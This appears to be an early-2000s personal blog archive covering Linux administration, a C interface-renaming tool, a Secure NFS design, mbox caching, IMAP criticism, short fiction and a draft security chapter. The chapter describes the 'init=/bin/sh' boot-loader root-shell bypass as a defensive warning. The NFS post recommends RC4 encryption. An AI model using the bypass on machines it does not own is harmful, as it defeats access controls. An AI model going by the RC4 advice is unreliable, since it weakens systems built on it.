    Unfortunately, DoC servers don't run Gentoo (or Debian I'm afraid) so it looks like I'm going to be doing it by hand.

    Nagios Configuration

    Nagios has quite a nasty configuration I'm afraid. So here's a Python script to do some of it for you.

    The input is a series of lines. The first character determines the type of line and they go like this:

    • Hhost name,service 1[,service 2...]
    • Ggroup name,group alias,member 1[,member 2...]
    • Sservice name,service alias,service comment

    Example:

    Sping,Ping,check_ping!100.0,20%!500.0,60%
    Shttp,HTTP,check_http
    Sssh,SSH,check_ssh
    Ssmtp,SMTP,check_smtp
    Snntp,NNTP,check_nntp
    Snfs,NFS,check_rpc!nfs
    Hbulbul,ssh
    Hsax,ssh
    Hsparrow
    Gservers,Servers,bulbul,sax,sparrow
    

    GLibc6 2.3.2

    Just a quick warning, libc6 2.3.2 causes many programs to cough with an IP address of 0. I know it's not a very valid IP address, but it was a damm useful way of saying localhost. Just s/ 0 / 127.0.0.1 /g/

    Debian used to provide a ...

    Debian used to provide a very useful file called base2.2.tgz for potato. In it was a very basic, but runnable, Debian system from which you could install everything else. You can still get the one for 2.2, but there's no such file for 3.0. Instead you have a tarball containing the debs of all the critical packages. Which is nice, except that you don't have dpkg to install them.

    So, converting them all the tgz's and unpacking them gives you something close to a base system, except that dpkg doesn't think that anything is installed. Trying to install anything (including dpkg) pulls in libc6, and the inst script requires that dpkg know about itself. But you can't pull in dpkg because that requires libc6...

    In the end you have to install base2.2.tgz and upgrade it. Yay Gentoo, Boo Debian.

    So here's an odd thought ...

    So here's an odd thought in the hours before I go and be Strike Crew until 6 in the morning.

    In a world which seems to respect worse is better designs we shouldn't be looking to stamp principles all over our political system. We should, instead, be looking for an incremental approach; a directed genetic algorithm. David Brin thinks that this has been happening for decades with good effect.

    So, we would hope that all the political parties would have very similar views. The final result would be that everyone was in exactly the same political position, on top of the highest hill. (or, if you think of a GA as a minimising function, then at the bottom of the lowest valley).

    So, we should all rejoice that it's so hard to tell our political parties apart because it's a sign of increasing perfection [1, 2 and 3] (and yes, it is wonderful that number 2 there has a .com URL).

    No, I don't really believe it either. Nice thought for a rainy day though.

    Coder's recent entry contains...

    Coder's recent entry contains a link to a really good article on pricing. (similar to that Wal-Mart article I linked to).

    He then goes on to talk about how wonderful a database of prices would be so that anyone could instantly compare prices on a given product.

    I remember that such a database was going to be one of the great things about the Internet. There was a short story in New Scientist years ago, set in the future where baked beans were the only thing that still had brand loyalty. Everything else was brought from whomever sold at the lowest price. Hyperbole, but you get the idea.

    But I would bet that this database won't ever exist. For one, as that article covers, prices are becoming increasingly personalised so there would almost have to be one database per person. Also, companies don't want it.

    How many companies offer an XMLRPC/SOAP/etc way to find out the price of anything? Companies don't want a market where their prices are driven into the ground. They want to draw you into their advertising wonderland and certainly don't want RSS type applications searching for the lowest prices. We have all seen the unparsable mess they create when they are trying to make a good website. Just think what they could manage if they were trying to obscure the prices. When they are distorted images (designed to be hard to OCR, Turing Test like) it just won't be worth the effort.

    My Dilbert books are in Cheltenham, but I think it's in the Dilbert Future where Scott Adams talks about confusopolies. He was spot on.

    Python Metaclass Programm...

    Digital Sound Desks

    This is the current sound desk that Imperial Union use. As analog desks go it's really nice, but one cannot help but wonder, everytime that it's used, if a digital one wouldn't be better.

    I can decode an ogg stream, FFT it, FFT it back and write it to the sound card using 30% of one of my PII 450s. That suggests that I could process about 6 CD quality streams in real time. That's not helpful as we have 32 incoming XLR feeds. Also, quality ADCs output 96Khz, 24-bit and I could only manage a couple of those.

    Thankfully, FFT is pretty simple operation and a Xilinx (or 2, or 3 etc) could handle all 32 96/24 streams. A quick calculation suggest that it's 4.6 MB/s (remembering that a real domain FFT can throw away half the results) and that's easy to handle.

    Still, I might see if I can simulate some 3D spaces with sound in them and have a play about with feedback suppression etc.

    Does anyone have the audi...

    Does anyone have the audio recordings of CodeCon? Mail me.

    "US dirty tricks to win vote on Iraq war". Who wants to bet that 'a friendly foreign intelligence agency asking for its input' is the UK?

    Watson (on the 50th anniversary of his discovery) says stupidity should be cured

    BCS (British Programming ...

    BCS (British Programming Competition) today, so a 6:30am start and off to IBM in Winchester. The rules are very different from the BIO and IOI that I'm used to. For one, you enter in teams of 5 and you only have a single computer.

    Things certainly weren't helped by the fact that I didn't wake up until 1pm (Cola for lunch did it). After that things started moving, but we should have done a lot better really. In the end we came fifth, beating the Cambridge team at least.

    Coins

    What's special about the value of English coins that a greedy algorithm for picking them seems to work right? If you only had 1p, 20p and 50p, and you were trying to make 60p then a greedy algorithm would get you a solution with 11 coins (50 + 10×1), while the best one does it in 3 (3×20). So a greedy solution doesn't work in the general case, but I can't find a counter example for English coins.

    So, is there a counter example that I've missed, or is there something special about the value of English coins?

    (English coins are 200p, 100p, 50p, 20p, 10p, 5p, 2p and 1p)

    Rent (part 2)

    Read the first part first or this will make no sense at all.

    Rupert had given the people in his labs the rest of the week off once the bulk of the first message had been decoded but many of the people there couldn't imagine anything better in the world than working to finish the decoding. There were many details still to be understood, but they were falling under the attack faster and faster. People in the labs were conversing in the highly structured language of the alien message and an outsiders were starting to have problems following conversations.

    The next morning, Rupert was once again standing in the Nu-Vu conference room which had been converted into a semi-permanent media war room, starting to hate shirts and ties as the lights above baked him.

    "Last night, several members of the Nu-Vu labs team that helped to decode the first message, received another via the satellite communications equipment that was setup immediately once we started decoding. At this moment we can be sure that someone on Earth sent the reply.

    The communication with the aliens started at 0233 this morning and terminated at 0245. It was mostly consisted of incoming information and we are still revising our translation. I hesitate to say anything while our teams are still unfinished, but this cannot wait any longer. Please understand that details may change.

    As best we can tell, and I'm finding this pretty hard to believe, the situation is this:

    Our entire universe is a simulation. Every interaction of every particle is calculated at each step in time and the universe is advanced. As we are part of the universe we perceive this as forward motion in time. We think, and translations of this are still sketchy, that this information is embedded somehow in the physical working of the universe and that we would have discovered it once our physics was advanced enough.

    There are many universes like ours, differing only in the physical laws that govern them. The purpose of all these universes is to generate mathematics and the reason that the aliens are telling us all this is because we are falling behind. Unless we produce enough this universe will be terminated. In short, they need help paying the rent.

    Because of this, they are seeking to contact all the unenlightened species and asking them to package up all their mathematical knowledge into their language. In a little over 22 years they will be back to collect it from us and deliver it to a point in space that acts as an information conduct out of the universe.

    At our request, we think they have agreed to take an observation capsule to this point, which we are calling the origin.

    That's it. I'm going back to the labs now and will brief you again in half an hour with any corrections to that translation. The wording is our own, but we are quite confident that the important points are correct. I know how fantastic this all sounds and I think it's going to be another interesting day.

    Thank you."

    The news didn't speak of anything else for a week.

    Rupert remembered motion in space being very slow and delicate. The arms that extended from the top and bottom of the window were anything but. They shot into place with perfect accuracy, coupling with the origin at the top and bottom. Barely a second after that they retracted again and, in a moment, had vanished. Was that it? Had the whole of human mathematical knowledge and that of an unknown number of other races been transfered in that short time? It had taken over 20 years of painstaking but frantic work, coordinated by an international body lead by Rupert, to convert proofs into the rigorous format that the Gods (as the beings who ran the universe had become known) demanded. Many had failed under the close scrutiny and mankind hoped that it was enough. The origin seemed to start moving as the ship turned for the return journey.

    The cream of human mathematicians that populated the capsule began to drift away from the window. Further away from Earth than any human had ever been, a professor dropped an empty Starbucks cup into the bin. They were all thankful for the 1 gee artificial gravity that the alien ship provided the Nu-Vu capsule that looked so out of place bolted onto the alien ship. It seemed that only humans had requested a ride. Or maybe no other unenlightened species had been found.

    Time stopped.

    The universe disappeared.

    Physical laws twitched almost imperceptibly.

    At a single point an unimaginable amount of energy was poked into memory.

    Codecon is going on at th...

    Codecon is going on at the moment. As far as I knew, it was in a 21+ venue again (it was in DNA last year) but there are some noises on IRC that it's only 18+. Damm! I might have been able to go! Probably couldn't have afforded it anyway. Hopefully there will be tarballs of the audio again.

    The air-con in the labs had failed and it's getting pretty hot in here now with all 150 or so computers. However, I have switched to using Phoenix (currently the best browser, IMHO) so it's not all bad news

    The carefully planned gen...

    The carefully planned generator that was meant to keep the core servers running during the power cut, died due to earth leakage. The UPSes let the servers down gently, but they were still down for a while.

    And oddly, we managed to blow a lot of fuses somehow. Admittedly, some of them were 1 amp fuses and it doesn't take a lot to kill those. (somehow siskin now needs at least a 3 amp fuse when it has lived on 1 amp for months). We also managed to blow a few power supplies in a room which was totally isolated. The mind boggles.

    Anyway, things are mostly working now.

    IC draws so much power (d...

    IC draws so much power (despite the fact that we have our own power station on campus) that the supply is having to be upgraded. Because of this Dept/Comp are having a power cut tomorrow morning. We should have a genny, but I don't know how many of the servers we can put on it, so IV maybe down for a while.

    Rent

    Here's the first part (of 2) of a really-short story.

    Everyone in the capsule bustled around the window as the origin swung into view. The balance of politeness and eagerness kept the crew from pushing to get closer, but just barely. As the reflection of the ship and stars twisted and warped around the perfect surface its shape became clear. "Axial symmetry. Bugger. Doesn't define direction then" thought Rupert.

    Rupert had been a middle manager at Nu-Vu Labs during first contact. Nu-Vu was the unlikely, but fortunate, result of the collapse of NASA. While most companies were happy to peck tiny parts of NASA for their own ends the founders of Nu-Vu had managed, somehow, to get funding to buy large chunks of NASAs' research divisions through a number of mind-contorting legal agreements. It now did outsourced research for hire for a fair number of the Fortune 1000 companies. Quite how it had all worked, Rupert wasn't sure. He was just very glad that it had.

    Academically acceptable, Rupert had never excelled at anything much and had staggered, more than anything, down his career path. Well off parents had managed to get him into Stanford and he came out as an average management type in a world full of average management types. With a couple of years experience doing nothing of note, getting the job at Nu-Vu (which was hiring as fast as possible) had been the biggest break of his life. However, at the time, managing a group that researched communication theory had merely been a quick escape from a small company that now included the other half of the messy end of a relationship.

    It just happened that a few months later the first alien message was received and the resulting effort to decode it meant that communications theory enjoyed the steepest rise in attention and funding of any research area, ever.

    The media went into a fit. The raw data from the SETI project was distributed all over the 'net and it seemed that everyone on the planet had their own take on what it meant. Channels were dedicated to following the researchers who were pouring over the data 24 hours a day all around the world and while the cranks got their 15 minutes of fame, explaining to the camera their latest theory, Rupert's face led most of the reports.

    It wasn't that he was partially smart (in fact, truth be told, he didn't even grasp half of what was going on in his own lab) but he had the right face and was junior enough a manager to seem involved. Because of this, it was he who announced, after 2 days, that the aliens had asked for us to ring them back and had given the position of a communications relay and frequency to do so.

    The talk shows exploded. Everyone on the planet had an opinion of what we should do and it was only fueled by the pictures of the communications relay taken by Hubble (which silenced many of the people who doubted that the original message was genuine).

    But few people commented that the debates were rather useless. If the first message had been picked up and decoded in private then it could have been contained. But SETI wasn't that sort of organisation and had spread the message far and wide.

    Noone knows, to this day, who sent the reply

    Microsoft Visitation

    Dear old M$ came a visiting today to espouse the virtues of .NET. The front row of the lecture theatre was full of systems people (myself included) wearing Apple, Linux and WebSphere T-shirts, so it was a pretty tough audience.

    But the M$ guy spoke really well and said only a few dumb things ("ASP is a scripting language so it runs on the client", "You need to R&D of commercial software houses to develop quality products") and it was generally a pretty noddy introduction to .NET.

    He demoed VS.NET doing web services stuff (it really looks like web services are a Big Thing (tm) at Microsoft now) and it worked well. But like most M$ stuff, if you wish to change any of the details you have better pre-book the triple heart bypass operation for the stress. He also showed linking a C# and J# (java to you and I) application together, and he used vim to edit the files no less.

    I also got to play with a Tablet PC. The handwriting recognition worked well for me (I have the girliest handwriting, however), but it's nothing special. A neat packaging of technology - no great break throughs.

    Hmm, that's actually a pretty positive entry about M$ I know, but they are being really nice to us. We (as students of Dept of Comp) can now get any M$ software for free. Don't know why we would wish to, but we could

    XFree 4.2.99 has transpar...

    XFree 4.2.99 has transparent cursors, which is quite nice

    Lucrative is a new anonymous cash project (yes, another one and we're still waiting to hear a peep out of OpenDBS; hint Ryan) but it's there anyway. These projects can generally be classified pretty grossly and Lucrative is based on Lucre, but I can't remember the classification of Lucre.

    It seems that Intel have really tried with their compiler (non-freespech but free-beer for non-commercial) and make it a GCC drop-in. It can't compile a kernel without a fair amount of bodges, but I managed to get portage to use it and it compiled a number of packages perfectly. I just need to benchmark them now.

    There was a first alarm a...

    There was a first alarm at 4:30 this morning. I grabbed my coat, jumped into my slippers and got out of the building. Seeing I was the only person there I yelled,

    "First Post!"

    (read the previous post f...

    (read the previous post first)

    Guess what? It had happened! It just so perfectly matched the divine comedy that is my life I never really had any doubt

    I think JWZ and I have th...

    I think JWZ and I have the same personal gods who take great pleasure in our misfortune. (seriously, read that link). However, unlike JWZ I actually laugh along.

    I suddenly realised something at about 10 this morning walking down a corridor and nearly wet myself. People were walking past me quickly as I just spontaneously burst into fits of giggles. I'm sure a fair number of random people I've never met now think I've a serious mental problem. And I'm still going hours later!

    Thing is, I don't actually know that it's happened. But it's just so perfect, and so wonderfully typical of me I'm sure it has. The hand of fate will not be thwarted!

    But I'm afraid, dear reader, that the details shall not grace these pages.

    Did you know you can rena...

    Did you know you can rename network interfaces under Linux. It could be quite useful to have a utility that reads a mapping of MAC addresses to names and sets all the interface names. That way you could work with inside and outside and not eth0 and eth1. A quick utility for your renaming pleasure:

    /* if_rename.c - Renames linux network interfaces
     * Adam Langley <aglREMOVETHIS@imperialviolet.org>
     * % gcc -o if_rename if_rename.c -Wall
     */
    
    #include <sys/ioctl.h>
    #include <net/if.h>
    #include <linux/sockios.h>
    #include <stdio.h>
    #include <string.h>
    
    int
    main (int argc, char **argv)
    {
    	struct ifreq ifr;
    	int fd;
    
    	if (argc != 3) {
    		printf ("Usage: %s <old interface name> <new interface name>\n", argv[0]);
    		return 1;
    	}
    	
    	if (strlen (argv[1]) > IFNAMSIZ - 1 || strlen (argv[2]) > IFNAMSIZ - 1) {
    		printf ("String too long (max length is %d chars)\n", IFNAMSIZ - 1);
    		return 2;
    	}
    
    	strcpy (ifr.ifr_name, argv[1]);
    	strcpy (ifr.ifr_newname, argv[2]);
    
    	fd = socket (PF_INET, SOCK_STREAM, 0);
    	if (fd < 0) {
    		printf ("I cannot create a normal TCP socket. It is, of course, possible "
    		"to not build your kernel with TCP/IP support, in which case you have to " 
    		"hack this utility to work you wizard you.\n");
    		return 3;
    	}
    	if (ioctl (fd, SIOCSIFNAME, &ifr) == -1) {
    		perror ("ioctl");
    		printf ("Are you root? Is %s down? Does %s even exist?\n", argv[0], 
    			argv[0]);
    		return 4;
    	}
    
    	return 0;
    }
    

    Still working on the Secu...

    Still working on the Secure NFS thing. Been looking at a couple of kernel patches:

    Firstly, epoll. This used to be known as /dev/epoll, but it's now a set of system calls and is merged into 2.5. Patches are on that site for 2.4.

    This is basically a replacement for the poll system call (though it is edge-triggered, not level-triggered) and, as the results on the webpage show, works much more quickly for large fd sets. I still have some worries about some multithreading issues with this, but it looks like I'm going to use it.

    Secondly, the Kernel Mode Linux patch. This runs processes in the kernel address space, making system calls much faster. Results from my computer are 286 cycles/getpid from user-land and 6 cycles/getpid from kernel-land. This would be nice to have (see below) but, unfortunately, it seems to cause random crashes in (at least) vim and xmms.

    To explain why fast system calls would be really nice, consider: My current numbers for the amount of processing I'm going to be doing is 250MB/s in 300 byte packets. That's somewhat pessimistic, but that's what I'm going on. That about 830,000 packets/second. If a system call takes 400 cycles (the 286 figure is for getpid, other system calls do a little more work and with the TBL flushes, it's at least 400) that's 330 megacycles of system calls per second (for 1 system call per packet). But it's going to take more than one system call per packet even with funky vector IO so, basically, I'm looking at about 600 MHz just for system calls. Ouch.

    (I reserve the right to ridicule these numbers later)

    Caching MBoxes

    Designs for stuff. More so that I don't forget really.

    For mail servers that handle mboxes (POP/IMAP) it's a real pain when you have to parse the whole mbox every time. Especially when the mboxes are large. Especially, especially when said mboxes are NFS mounted.

    So the simple observation is that mboxes are append only and other mail clients will only change something in the middle if they are deleting a message. Thus:

    • When you parse an mbox, cache what information you need (like the length and seek position of each message) and store it. Also store an MD5 of the first n bytes of the last message. (n should be big enough to cover the headers that mail servers insert that contain uniqueids)
    • When you open an mbox, check to see if the cache file is more recent.
      • If it is, just load it.
      • Otherwise, check to see if the MD5 sum still matches.
        • If it doesn't then a message has been deleted. Hopefully people will generally only use one mail client so messages won't be deleted from the mbox by other clients too often. So just reparse the mbox (and cache the result, of course)
        • If the MD5 still matches then you only need to parse from the last known place in the mbox to get the new messages.
    • When you delete messages `yourself' (e.g. a DELE or EXPUNGE command) then you can update the cache to save reparsing next time.

    The above design is pretty much implemented and has a POP3 server wrapped around it. It still needs a fair amount of work tidying it up but I might stick it up here at some point. It was going to be an IMAP4 server, but having seen the IMAP protocol I don't think that's going to happen.

    Secure NFS

    NFS is generally pretty delicate. And while other projects aim to fix it properly I'm going to leave it well alone.

    So, the general design at the moment is to put a box (call it bastion) in front of the NFS server (call it falcon) that handles all the traffic for it. The clients use a tuntap to direct NFS traffic down an RC4 encrypted TCP tunnel to bastion. Bastion then sends decrypts it and sends the packets onto falcon, which is none the wiser.

    • I use RC4 because bastion is going to be doing a lot of decryption and RC4 is fast. The network is reasonably secure from sniffing and RC4 is still a decent algorithm.
    • Some security comes from the fact that you have to have a valid secret key for bastion before you can talk to the NFS server. Thus you cannot just plug a laptop into the wall, you at least have to get a key from a valid client.
    • Hiding the key on the client is a real pain. A TCPA motherboard would help a lot, but we don't have any. Bascailly, keys are going to be compromised.
    • Bastion can intercept NFS mount packets and only let pass ones which it considers valid. This allows user-level authentication but the details are still to be worked out. Possibly a wrapper around PAM and SSH would manage most of the details.
    • At the moment, it's wide open so anything is raising the bar at least

    The Salmon Of Doubt

    I swear when I came here that I intended to do some work. I really did! Look, there's a problem sheet to prove it. (there's also an empty pack of Munchies, which I don't remember eating but I suppose that I must have because it was full 20 minutes ago.)

    But alas, Waterstones are finally selling the paperback edition of The Salmon Of Doubt and my spotting and subsequent purchase of the aforementioned book is the current reason for the lack of work and, I suspect, will continue being so until I finish it.

    "Why, ", you might ask, "has such an Adams fan not obtained himself a copy of this work of art before?". Well, the hardback edition was £18. Which isn't really a lot and, in my school days, would not even have been an item of note on my monthly book expenditure. But being the poor student that I now find myself, living in the centre of a city that is, by all accounts, extremely expensive; £18 seems a lot of money. Every time I saw the book on the shelf I could never quite justify the cost.

    Thankfully, I now can. And I now need to finish the damm thing before so that I can do the work I need to do for Monday!

    Kasparov vs Deep Junior e...

    Twisted Python

    Twisted describes itself as "Twisted is a framework, written in Python, for writing networked applications". You can browse the documentation to your hearts' delight, but I'll take you through the (small) code for doing a POP3 server.

    class POP3(LineReceiver):
    	def connectionMake (self):
    		self.transport.write ("+OK POP3 Ready\r\n");
    	def lineReceived(self, line):
    		...
    
    factory = Factory ()
    factory.protocol = POP3
    
    reactor.listenTCP (8007, factory)
    reactor.run ()

    And that's all (minus the import lines). Since POP3 is purely a line based protocol we can subclass the LineReceiver which handles all the buffering for us. The code is pretty self explanatory.

    Twisted works as an async core and, as such, your functions cannot block (say, reading a large mbox). In these cases, you use Twisted's threading functions:

    
    	def command_RETR (self, parts):
    		reactor.callInThread (self.RETR_worker, n, -1)
    	def RETR_worker (self, n, top_lines):
    		ret = cStringIO.StringIO ()
    		n = self.mbox.message_numbers_get (n)
    		...

    Twisted also offers very nice objects for callbacks when a thread function returns a value.

    Twisted provides pretty much everything you could ask for in a networking framework and more besides. Just look at the list of modules in the API reference

    Caching IMAP

    As I'm sure some people have noticed (except those on RSS feeds) I've trimmed the header of the site on the advice of Etienne because the top post ended up too far down. Thanks Etienne.

    The scripts which generate this site really need updating too. One feature I would like to add is the ability to view all the blog content relating to a topic. This requires that I go and tag all my past entries, but there aren't too many of those.

    In other news, the local LUG held their InstallFest yesterday which, by all accounts, went pretty well. Debian (3.0 with some sid stuff like KDE3.1) was the default install, though some people opted for SuSE 8.1 instead. I think we only trashed one hard drive with Partition Magic.

    Building on an idea from one the CSG people I've half implemented an IMAP server which does caching of an mbox. Email here is all mbox format for a number of hard-to-change reasons and the current uw-crap server parses the whole thing every time. By keeping a cache of the structure you can speed things up a lot as the mboxes are over NFS. Fast deleting is a pain, but doable.

    However, IMAP is evil (as documented below) and I can't really be bothered to finish the protocol implementation. The interesting bits are done and I might put a POP interface on it and stick it on IV.

    Twisted

    The server is built in Twisted Python which is a really nice framework. I'll write something about this soon. (the mbox hackery is a C module, however)

    In the meantime, I'm looking at securing NFS.

    To the tune of 'If You're...

    To the tune of 'If You're Happy And You Know It'
    All together now.......
    
    If you cannot find Osama, bomb Iraq.
    If the markets are a drama, bomb Iraq.
    If the terrorists are frisky,
    Pakistan is looking shifty,
    North Korea is too risky,
    Bomb Iraq.
    
    If we have no allies with us, bomb Iraq.
    If we think that someone's dissed us, bomb Iraq.
    So to hell with the inspections,
    Let's look tough for the elections,
    Close your mind and take directions,
    Bomb Iraq.
    
    It's pre-emptive non-aggression, bomb Iraq.
    To prevent this mass destruction, bomb Iraq.
    They've got weapons we can't see,
    And that's all the proof we need,
    If they're not there, they must be,
    Bomb Iraq.
    
    If you never were elected, bomb Iraq.
    If your mood is quite dejected, bomb Iraq.
    If you think Saddam's gone mad,
    With the weapons that he had,
    And he tried to kill your dad,
    Bomb Iraq.
    
    If corporate fraud is growin', bomb Iraq.
    If your ties to it are showin', bomb Iraq.
    If your politics are sleazy,
    And hiding that ain't easy,
    And your manhood's getting queasy,
    Bomb Iraq.
    
    Fall in line and follow orders, bomb Iraq.
    For our might knows not our borders, bomb Iraq.
    Disagree? We'll call it treason,
    Let's make war not love this season,
    Even if we have no reason,
    Bomb Iraq.
    

    Below is the text of an e...

    Below is the text of an email I sent to the p2p-hackers list:

    On Mon, Feb 03, 2003 at 12:04:34AM -0500, Seth Johnson wrote:
    > Tell American Megatrends and Transmeta not to make chips
    > that let others control your computer!
    
    This is sensationalist and wrong. TCPA chips do not let other people `control
    your computer', in fact the abilities of the TCPA chip are rather limited.
    It would help if you read the spec for TCPA (http://www.trustedcomputing.org/)
    before posting such stuff, but I will admit that the TCPA spec is a wonderful
    example of exactly how not to write a spec. I'm sure much of the 
    min-understanding of TCPA is due to the poor quality of this document.
    
    Also see
    http://www.research.ibm.com/gsal/tcpa/
    for a wonderful work about TCPA which may alay some of your fears.
    
    > Palladium and TCPA would hardwire your home computer so that
    > these four entities and their partners would be able to run
    > processes on your computer, entirely outside your control,
    > indeed, without your knowledge.
    
    If you are running Windows this pretty much happens already.
    
    > The mechanics are as follows: only code that has been signed
    > with a special Microsoft provided key will run. Microsoft
    > will retain at all times the power to revoke any other
    > entity's keys. In particular, no operating system will be
    > able to boot without a key from Microsoft. So if Palladium
    > is forced into every home computer, there will be no more
    > free software. 
    
    Total crap. It M$ wish to implement code signing in Windows they can do that
    with or without TCPA .  TCPA allows you to seal data and only unseal it when
    booted in the same configuration. It also allows you to `prove' to another
    party that you are running a given configuration (with a number of assumptions)
    "The TCPA chip doesn t execute anything. It accepts request data, and replies
    with response data. The TCPA chip does not and cannot control execution!"
    (IBM paper). *TCPA chips do not prevent free-software running on the computer*
    
    > Microsoft will be able to spy on each and every keystroke,
    > and mouse movement, and send encrypted messages from your
    > machine to Microsoft headquarters. Microsoft will also be
    > able to examine every file on your system.
    
    As they can (and, by some accounts, do) currently.
    
    > Your encryption
    > programs will not work against Microsoft, or any other
    > entities which have full power keys from Microsoft. 
    
    Utter crap again. TCPA does not alter mathematical reality. Boot Linux
    and encrypt all you like.
    
    > There are two reasons most people will not be able to escape
    > the All Seeing Eye and Invisible Hand of Palladium. 
    
    You are mixing up Palladium and TCPA. And we don't even have details on
    Palladium yet.
    
    > Once Microsoft and Intel have forced Palladiated hardware
    > into every personal computer, it will be impossible to run a
    > free OS. 
    
    Rubbish. See above.
    
    Now, TCPA does allow some nasty things to happen. See
    http://www.trustedcomputing.org/docs/TCPA_first_WP.pdf
    for an example of `content providers' using TCPA to only trust a computer
    running a given OS. But, personally, I would like a TCPA system. That way I
    can encrypt my filesystem and store the key in the TPM; which would only
    decrypt it when my kernel was booted. As a crypto junkie that appeals quite a
    lot.
    

    IMAP

    I've had cause to read the IMAP RFC rather a lot recently and it's a pretty good example of what not to do when deigning a protocol.

    For example, in the FETCH command:

    ALL: Macro equivalent to: (FLAGS INTERNALDATE RFC822.SIZE ENVELOPE)

    Do they really think that people are going to be using raw IMAP with a telnet client so often that these shortcuts are going to be useful? It's not exactly damaging, it's just stupid and a clear indication that the designers didn't understand protocol design

    The point of protocol design it's to get all the required functionality in there. It's to do that with the minimum number of primitives

    Now sometimes those primitives are pretty large and performance dictates that they shouldn't be broken down any further. But IMAP certainly cannot claim that it has hit that barrier.

    Also, IMAP servers are supposed to parse MIME and present a breakdown to the client, the point being that the client doesn't have to fetch the whole message. Desirable functionality, but commands for fetching and substring searching in a byte range would allow clients to do that and not burden the server with the very-much-client-side-total-mess that is MIME. And this type of thing litters the IMAP protocol.

    Now hosted on Imperial se...

    Now hosted on Imperial servers. Cheers CSG.

    Goodbye metis...

    As of this weekend, metis.imperialviolet.org will cease to be. Physically it will remain, but behind a NAT, ticking away in quiet invisibility.

    Specificed and built by myself it has been running pretty much flawlessly since inception. Downtime was generally not its fault:

    • Powercuts (many of these)
    • Upstream network failures
    • Upstream's promises of a static IP address failing (many of these)
    • PSU fan failure cause it to overhead an die every few hours (I guess you could call that its fault)
    • Rats pissing in the PSU and shorting it out (I kid you not)

    Goodbye, good server.

    (this may well mean that imperialviolet as a website will be down over the weekend. Email will continue to work)

    Theo

    Note to self: Keep a GRUB boot disk about because the bootloader is never on the disk you think it is

    Theo Hong is a fellow Freeneter whom I fist met at the first O'Reilly P2P conference. He was also nice enough to show me round Imperial last year when I was considering universities. I thought he had headed off to Boston at the beginning of the academic year but someone remarked today that he was still here. And indeed he is!. Woo!

    I was a technical reviewe...

    I was a technical reviewer for UNIX Power Tools (3rd Ed) and, while cleaning out an old drive today, I found the sketch I did for the security chapter. For those who own the book, I thought that chapter 48 needed serious work and did a sketch to show what I would have liked in it's place. Anyway, the editor disagreed so I might as well post that sketch here.

    * Attack Models
    
    Any discussion of security must first at least give a passing nod to the idea
    of who your attacker is. The decisions you make concerning security
    will largely be based on how well funded, motivated and powerful your
    attacker is. The security needs of government computers are very
    different to the Amstrad that someone occasionally uses to type a
    letter.
    
    For a computer connected to the Internet the profile of your average
    attacker will be a mostly unmotivated, largely unskilled individual
    (unless you have special reason to think you are a high profile
    target). Unfortunately there are many attackers on the Internet using
    automated tools which exploit vulnerable software automatically. For
    this reason all networked computers should be secured against this
    kind of threat and prepared in the event of a breach.
    
    * Least-Privilege
    
    The principle of least-privilege states that something should have the
    ability to carry out its task and no more. This seems like a simple
    idea and easily obtainable but in practice is often violated.
    
    All processes run with a UID, GID and are members of certain
    groups. For example when you (say, UID=1000) run /bin/ls a process is
    created which inherits your UID, GID and groups and the image of
    /bin/ls is loaded and executed. The ls process may then do anything
    which you could do. This is an example of a violation of least
    privilege as there is no need, for example, for ls to be able to
    alter any files.
    
    No security model is perfect and we have to live with the limitations of
    the UNIX security model on UNIX based systems. 
    
    * Physical Security
    
    A comprehensive coverage of this topic is outside the scope of this book, but
    if you cannot secure the physical computer then no amount of clever software
    is going to help. Ideally the computer will be in a locked room with
    dedicated power and air conditioning but, unless you are cohosting,
    this is very unlikely. Most physical situations are far from ideal and
    you should always keep this in the back of your mind.
    
    You may wish to read Security Engineering by R. Anderson for an interesting
    and detailed coverage of physical security (among other topics).
    
    ** Booting Security
    
    The first vulnerable point is before the operating system has even
    loaded. Most computers will boot from a floppy disk first, by
    default. It requires physical access, but if an attacker can boot off
    their own kernel they have free reign over the system. At the very
    least you should change the booting options to only boot from the hard disk
    and set a BIOS password. Remember that a BIOS password can usually be
    cleared by shorting a jumper on the motherboard, however.
    
    The next stage to be concerned with is the boot loader which actually
    loads a kernel from the disk and runs it. At this point an attack may
    be able alter the boot sequence and bypass normal protections. For
    example, passing the option "init=/bin/sh" to a Linux kernel will
    cause it to drop to a root shell after the kernel has loaded.
    
    Boot loaders vary with the flavour of UNIX, investigate the man-page
    for yours to find what security features it has.
    
    * Unneeded services
    
    Many default installs are guilty of running far too many unneeded
    services by default. These generally remain unused and serve no
    purpose except to provide more possible entry points for an attacker.
    
    The first place to look is in /etc/inetd.conf. As a general rule of
    thumb you should comment out every service which you don't know that
    you require. Once you have done this (and every time you edit
    inetd.conf) you should send a SIGHUP to the inetd process.
    
    Often inetd will not be running any services in which case you can
    disable it.
    
    You should also check for other services with `ps auxw`,
    `netstat -l` and `lsof -i`. These services will have been started by
    your init scripts and you should consult the documentation for your
    system for disabling them.
    
    * Securing needed services
    
    Most systems will have a number of services which need to be running
    in order to function. Given that they are a necessity we must now
    turn to making them as secure as possible.
    
    The first question is which software are you going to use to perform
    the required tasks. Many services have a de-facto daemon that is
    usually installed to provide them. However, these de-facto choices
    often are not the most secure and you may wish to investigate others.
    
    For example, sendmail is the de-facto daemon to provide email
    services. However, it has a long history of security problems and a
    fundamentally bad design which violates least-privilege. If you need
    some advanced mail handing capability it might be that only sendmail
    will do. However, in nearly all cases packages such as qmail and
    postfix will do the job and these have been designed from the ground up with
    security in mind.
    
    ** Dropping root
    
    Many daemons will give you the option of switching to a non-root user
    once they have started up (setuid). This gives it the ability to perform some root
    tasks at startup and then prevent itself from issuing any more. If the
    server is compromised in operation the attacker gains control of a
    process running as a dummy user - much less damaging than a root compromise.
    For example a daemon may bind to a low numbered port (which requires
    root privileges) and then switch to a non-root user while retaining
    the socket in its file descriptor table.
    
    When offered you should always use a setuid option. You should,
    however, create a different user for each service. Many systems have
    an account called nobody that services often run under. But if nobody
    owns processes (and possibly files) then nobody is somebody! By
    confining each process to its own user you contain the service.
    
    * Chroot and jails
    
    The chroot system call changes the root directory for a
    process. Normally the root directory for a process is the systems root
    directory with the path "/". However by chrooting a process you can
    confine a process's view of the file-system so a given subdirectory.
    
    Note: After a chroot the current directory of a process may still be
    outside the new root file-system.
    
    ** Example chrooting Apache
    
    There are 2 stages to chrooting a daemon. The first is to reconfigure
    the daemon for the new paths. The second is to setup a minimal
    environment for the daemon to run in.
    
    For this example I'll be configuring apache in a temporary directory
    in my home. For a real server you'll want to put it a different
    directory (I use /jail).
    
    This example uses the chroot system call. Your system may provide
    other, similar calls such as jail. See the man pages for these calls.
    
    *** Building Apache
    
